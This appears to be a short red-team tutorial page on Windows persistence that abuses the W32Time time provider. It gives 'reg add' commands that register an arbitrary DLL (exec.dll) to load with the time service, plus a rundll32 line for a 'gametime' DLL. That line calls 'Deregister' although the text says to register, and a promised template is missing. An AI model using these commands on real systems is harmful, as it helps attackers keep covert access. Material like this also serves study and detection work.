Time Provider

Windows OS uses time providers to synchronize time with other machines in the network to obtain accurate information from other network devices. Time synchronization is very important as many protocols in AD have this as a requirement.

Note that your dll needs to be coded in a special way, a template of this can be found by Scott Lundgren from Carbon Black:

To use this for persistence, we can add these registry keys

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_EXPAND_SZ /v "DllName" /d "%systemroot%\system32\exec.dll" /f 
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "InputProvider" /d "1" /f

Or use the gametime dll and run the register function from it: 

rundll32.exe gametime.dll,Deregister
PreviousAppCert DLLsNextWaitfor

Last updated